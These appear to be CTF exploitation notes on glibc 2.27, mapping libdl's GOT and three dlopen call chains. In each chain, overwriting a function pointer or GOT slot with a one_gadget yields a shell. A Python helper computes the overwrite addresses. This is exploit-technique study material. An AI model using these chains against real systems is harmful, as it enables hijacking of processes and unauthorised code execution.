[Pwn notes] Summary of dl call chains

The GOT table in libdl

Example libc: libc6_2.27-3ubuntu1_amd64.so

The table below is libdl's .got.plt (libdl-2.27.so, the object that holds dlopen in this glibc version) as shown by pwndbg's telescope. GOT[0] holds the link-time address of _DYNAMIC, GOT[1] the link_map (its first field, l_addr, is libdl's load base, 0x7f9587ccf000 here) and GOT[2] the lazy resolver _dl_runtime_resolve_xsavec. Every later slot still points back into its own PLT stub, and the push N in that stub is the relocation index, so slot N sits at GOT + 0x18 + 8*N. Since libdl is lazily bound, these slots are writable at runtime, which is what chain Ⅲ below relies on.

0x7f9587ed2000 (_GLOBAL_OFFSET_TABLE_) ← 0x202d90
0x7f9587ed2008 (_GLOBAL_OFFSET_TABLE_+8) → 0x7f95880d1000 → 0x7f9587ccf000 ← jg     0x7f9587ccf047
0x7f9587ed2010 (_GLOBAL_OFFSET_TABLE_+16) → 0x7f9587eea750 (_dl_runtime_resolve_xsavec) ← push   rbx
0x7f9587ed2018 (_GLOBAL_OFFSET_TABLE_+24) → 0x7f9587ccfd56 (__asprintf@plt+6) ← push   0 /* 'h' */
0x7f9587ed2020 (_GLOBAL_OFFSET_TABLE_+32) → 0x7f9587ccfd66 (free@plt+6) ← push   1
0x7f9587ed2028 (_GLOBAL_OFFSET_TABLE_+40) → 0x7f9587ccfd76 (strcpy@plt+6) ← push   2
0x7f9587ed2030 (_GLOBAL_OFFSET_TABLE_+48) → 0x7f9587ccfd86 (__stack_chk_fail@plt+6) ← push   3
0x7f9587ed2038 (_GLOBAL_OFFSET_TABLE_+56) → 0x7f9587ccfd96 (_dl_catch_error@plt+6) ← push   4
0x7f9587ed2040 (_GLOBAL_OFFSET_TABLE_+64) → 0x7f9587ccfda6 (calloc@plt+6) ← push   5
0x7f9587ed2048 (_GLOBAL_OFFSET_TABLE_+72) → 0x7f9587ccfdb6 (__dcgettext@plt+6) ← push   6
0x7f9587ed2050 (_GLOBAL_OFFSET_TABLE_+80) → 0x7f9587ccfdc6 (_dl_signal_error@plt+6) ← push   7
0x7f9587ed2058 (_GLOBAL_OFFSET_TABLE_+88) → 0x7f9587ccfdd6 (_dl_vsym@plt+6) ← push   8
0x7f9587ed2060 (_GLOBAL_OFFSET_TABLE_+96) → 0x7f9587ccfde6 (_dl_addr@plt+6) ← push   9 /* 'h\t' */
0x7f9587ed2068 (_GLOBAL_OFFSET_TABLE_+104) → 0x7f9587ccfdf6 (_dl_sym@plt+6) ← push   0xa /* 'h\n' */
0x7f9587ed2070 (_GLOBAL_OFFSET_TABLE_+112) → 0x7f9587ccfe06 (_dl_rtld_di_serinfo@plt+6) ← push   0xb /* 'h\x0b' */
0x7f9587ed2078 (_GLOBAL_OFFSET_TABLE_+120) → 0x7f9587ccfe16 (strerror@plt+6) ← push   0xc /* 'h\x0c' */
0x7f9587ed2080 (__dso_handle) ← 0x7f9587ed2080
0x7f9587ed2088 ← 0x0
0x7f9587ed2090 ← 0x0
0x7f9587ed2098 ← 0x0
0x7f9587ed20a0 (completed) ← 0x0
0x7f9587ed20a8 ← 0x0
0x7f9587ed20b0 ← 0x0
0x7f9587ed20b8 ← 0x0
0x7f9587ed20c0 (_dlfcn_hook) ← 0x0
0x7f9587ed20c8 (once) ← 0x0
0x7f9587ed20d0 (static_buf) ← 0x0
0x7f9587ed20d8 ← 0x0
0x7f9587ed20e0 (last_result) ← 0x0
0x7f9587ed20e8 (last_result+8) ← 0x0
0x7f9587ed20f0 (last_result+16) ← 0x0
0x7f9587ed20f8 (last_result+24) ← 0x0
0x7f9587ed2100 (__dlfcn_argv) → 0x7ffe4b070368 → 0x7ffe4b07228d ← 0x6c6c6168632f2e /* './chall' */
0x7f9587ed2108 (__dlfcn_argc) ← 0x1

dlopen call chains

Example libc: libc6_2.27-3ubuntu1_amd64.so

Each chain is read top-down as caller+offset and ends at the indirect call or PLT slot whose target an attacker with an arbitrary write can control. dlopen, _dlerror_run and dlopen_doit are in libdl, _dl_catch_error is reached through libdl's PLT, and _dl_open and _rtld_global live in ld.so, so the leak needed differs per chain.

Chain Ⅰ

dlopen+108
_dlerror_run+96
_dl_catch_error+42
_dl_catch_exception+109
dlopen_doit+111
_dl_open+60
_rtld_global+3840

Write the address of a one_gadget over _rtld_global+3840 and the next dlopen pops a shell. _rtld_global is in ld.so, so this needs the ld.so base rather than libc's. +3840 (0xf00) is _rtld_global._dl_rtld_lock_recursive, the function pointer _dl_open calls to take dl_load_lock before any loading happens; it is invoked with rdi pointing at the lock, so check the one_gadget's register and stack constraints against that call site.

Chain Ⅱ

dlopen+108
_dlerror_run+96
_dl_catch_error+42
_dl_catch_exception+109
dlopen_doit+111
_dl_open+236
_rtld_global+3848

Same idea with _rtld_global+3848 (0xf08), which is _rtld_global._dl_rtld_unlock_recursive, the pointer _dl_open calls once the open worker returns. It is reached on the failure path as well, so a dlopen of a library that cannot even be found still triggers it.

Chain Ⅲ

dlopen+108
_dlerror_run+96
_dl_catch_error@plt

Write the one_gadget over _dl_catch_error's GOT slot in libdl (_GLOBAL_OFFSET_TABLE_+56 in the table above, i.e. libdl base + 0x203038 for this build, reading libdl's base off the link_map pointer in GOT[1]) and _dlerror_run calls it on the next dlopen. This chain needs libdl's base, not ld.so's; the slot is writable because libdl is lazily bound, and since _dlerror_run always goes through _dl_catch_error, dlsym and dlclose hit the same slot as dlopen does.
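To turn the GOT table and the three chains above into exploit arithmetic, here is an added Python example (not part of the original note). It parses a constructed subset of the pwndbg dump shown earlier, checks that every slot sits at GOT + 0x18 + 8*N where N is the index its PLT stub pushes, reads libdl's base off the link_map pointer in GOT[1], and computes the three overwrite targets. The ld.so base and the _rtld_global offset used in the usage block are hypothetical placeholders; in a real script take them from your leak and from ld.sym['_rtld_global'].

```python
"""Added example, not part of the original note: parse a pwndbg telescope dump of
libdl's .got.plt, recover the relocation index each lazy PLT stub pushes, and
derive the write targets of the three dlopen chains from leaked base addresses."""
import re
from typing import Dict, NamedTuple

# Constructed sample input: seven lines of the libdl-2.27.so GOT dump shown above.
GOT_DUMP = r"""
0x7f9587ed2000 (_GLOBAL_OFFSET_TABLE_) ← 0x202d90
0x7f9587ed2008 (_GLOBAL_OFFSET_TABLE_+8) → 0x7f95880d1000 → 0x7f9587ccf000 ← jg     0x7f9587ccf047
0x7f9587ed2010 (_GLOBAL_OFFSET_TABLE_+16) → 0x7f9587eea750 (_dl_runtime_resolve_xsavec) ← push   rbx
0x7f9587ed2018 (_GLOBAL_OFFSET_TABLE_+24) → 0x7f9587ccfd56 (__asprintf@plt+6) ← push   0 /* 'h' */
0x7f9587ed2020 (_GLOBAL_OFFSET_TABLE_+32) → 0x7f9587ccfd66 (free@plt+6) ← push   1
0x7f9587ed2038 (_GLOBAL_OFFSET_TABLE_+56) → 0x7f9587ccfd96 (_dl_catch_error@plt+6) ← push   4
0x7f9587ed2078 (_GLOBAL_OFFSET_TABLE_+120) → 0x7f9587ccfe16 (strerror@plt+6) ← push   0xc /* 'h\x0c' */
"""

RESERVED_SLOTS = 3            # GOT[0]=_DYNAMIC, GOT[1]=link_map, GOT[2]=_dl_runtime_resolve
RTLD_LOCK_RECURSIVE = 3840    # _rtld_global._dl_rtld_lock_recursive   (glibc 2.27, chain I)
RTLD_UNLOCK_RECURSIVE = 3848  # _rtld_global._dl_rtld_unlock_recursive (glibc 2.27, chain II)


class GotSlot(NamedTuple):
    name: str        # imported symbol, e.g. "_dl_catch_error"
    addr: int        # runtime address of the GOT slot
    got_offset: int  # offset from _GLOBAL_OFFSET_TABLE_
    plt_index: int   # relocation index pushed by the stub at <name>@plt+6


class GotDump(NamedTuple):
    got_addr: int    # runtime address of _GLOBAL_OFFSET_TABLE_
    lib_base: int    # l_addr read through the link_map pointer stored in GOT[1]
    slots: Dict[str, GotSlot]


_GOT0_RE = re.compile(r"^(0x[0-9a-f]+) \(_GLOBAL_OFFSET_TABLE_\) ")
_GOT1_RE = re.compile(r"^0x[0-9a-f]+ \(_GLOBAL_OFFSET_TABLE_\+8\) → 0x[0-9a-f]+ → (0x[0-9a-f]+)")
_SLOT_RE = re.compile(
    r"^(0x[0-9a-f]+) \(_GLOBAL_OFFSET_TABLE_\+(\d+)\) → 0x[0-9a-f]+ "
    r"\((\w+)@plt\+6\) ← push\s+(0x[0-9a-f]+|\d+)")


def parse_got_dump(text: str) -> GotDump:
    """Pull the GOT address, the library base and every lazy-bound slot out of a telescope dump."""
    got_addr = lib_base = None
    slots: Dict[str, GotSlot] = {}
    for line in text.splitlines():
        if m := _GOT0_RE.match(line):
            got_addr = int(m.group(1), 16)
        elif m := _GOT1_RE.match(line):
            # GOT[1] -> struct link_map; its first field l_addr is the load base.
            lib_base = int(m.group(1), 16)
        elif m := _SLOT_RE.match(line):
            name = m.group(3)
            slots[name] = GotSlot(name, int(m.group(1), 16), int(m.group(2)), int(m.group(4), 0))
    if got_addr is None or lib_base is None:
        raise ValueError("dump does not contain GOT[0] and GOT[1]")
    return GotDump(got_addr, lib_base, slots)


def slot_offset_for_index(plt_index: int) -> int:
    """GOT offset of relocation index N: three reserved entries, then one 8-byte slot per import."""
    return 8 * (RESERVED_SLOTS + plt_index)


def layout_is_consistent(dump: GotDump) -> bool:
    """Every slot must sit where its stub's push index says; a mismatch means this is not a plain .got.plt."""
    return all(s.got_offset == slot_offset_for_index(s.plt_index) for s in dump.slots.values())


def dlopen_targets(dump: GotDump, libdl_base: int, ld_base: int, rtld_global_off: int) -> Dict[str, int]:
    """Addresses to overwrite with a one_gadget for the three chains.

    rtld_global_off is _rtld_global's offset inside ld.so (ld.sym['_rtld_global'] in pwntools);
    libdl's GOT offset is recovered from the dump itself rather than hard-coded.
    """
    got_off = dump.got_addr - dump.lib_base
    return {
        "chain I": ld_base + rtld_global_off + RTLD_LOCK_RECURSIVE,
        "chain II": ld_base + rtld_global_off + RTLD_UNLOCK_RECURSIVE,
        "chain III": libdl_base + got_off + dump.slots["_dl_catch_error"].got_offset,
    }


if __name__ == "__main__":
    d = parse_got_dump(GOT_DUMP)
    assert layout_is_consistent(d)
    # Leaks here are constructed: libdl base from the dump, hypothetical ld.so base and
    # hypothetical _rtld_global offset (0x228060 is a placeholder, not a verified value).
    for chain, addr in dlopen_targets(d, d.lib_base, 0x7f9588000000, 0x228060).items():
        print(f"{chain}: write one_gadget to {addr:#x}")
```

The same slot arithmetic works for any lazily bound library: disassemble the stub after <sym>@plt, take the index it pushes, and the writable slot is GOT + 0x18 + 8*N, which is how chain Ⅲ's target can be found without symbols for the GOT itself.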
